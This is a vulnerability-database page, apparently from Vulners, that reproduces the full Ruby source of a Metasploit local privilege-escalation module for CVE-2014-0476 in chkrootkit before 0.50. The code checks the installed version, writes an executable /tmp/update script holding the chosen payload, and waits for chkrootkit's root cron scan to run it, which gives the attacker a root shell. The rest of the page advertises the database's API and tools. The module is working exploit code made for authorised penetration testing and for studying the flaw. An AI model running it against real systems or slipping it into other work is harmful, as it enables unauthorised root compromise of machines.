Lucene search
K

Chkrootkit Local Privilege Escalation

🗓️ 18 Nov 2015 18:50:57Reported by Thomas Stangner, Julien "jvoisin" VoisinType 
metasploit
 metasploit
🔗 www.rapid7.com👁 68 Views

Chkrootkit Local Privilege Escalation. Executes /tmp/update as root, leading to trivial privilege escalation. WfsDelay set to 24h for chkrootkit scan

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chkrootkit Local Privilege Escalation',
        'Description' => %q{
          Chkrootkit before 0.50 will run any executable file named /tmp/update
          as root, allowing a trivial privilege escalation.

          WfsDelay is set to 24h, since this is how often a chkrootkit scan is
          scheduled by default.
        },
        'Author' => [
          'Thomas Stangner', # Original exploit
          'Julien "jvoisin" Voisin' # Metasploit module
        ],
        'References' => [
          ['CVE', '2014-0476'],
          ['OSVDB', '107710'],
          ['EDB', '33899'],
          ['BID', '67813'],
          ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
        ],
        'DisclosureDate' => '2014-06-04',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'SessionTypes' => ['shell', 'meterpreter'],
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Passive,
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i },
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation